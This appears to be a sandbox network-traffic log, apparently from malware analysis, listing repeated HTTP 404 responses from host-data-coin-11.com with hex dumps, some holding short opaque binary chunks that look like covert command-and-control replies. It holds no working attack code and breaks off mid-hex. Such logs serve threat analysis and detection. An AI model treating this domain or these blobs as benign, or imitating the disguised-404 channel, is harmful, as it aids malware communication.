                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:28 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 46 eb ab 8f 70 bc 57 da 4a d7 f7 26 84 22 e9 c3 90 50 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9FpWJ&"P*c0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 36 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 dd 4b d0 fe 26 85 21 ea a5 90 50 2e e2 be 4d 23 e3 b3 b4 6c fb 9f bc 50 ab 73 93 cb 32 40 5c 3c 0d 4b dd bb 4a be ff 57 99 bd d4 0b 8d 2b 80 cf 0d 0a 30 0d 0a 0d 0a Data Ascii: 65I:82OB%,YR("XPK&!P.M#lPs2@\<KJW+0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 48 ec a0 8a 70 bc 57 da 4a d4 f6 2e 87 25 eb c3 94 58 23 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9HpWJ.%X#c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OU&1UPJ$dP0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%XQAc}yc0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4a ed ac 8e 70 bc 57 da 4a d6 f7 22 81 20 ea c3 96 53 28 ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9JpWJ" S(c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 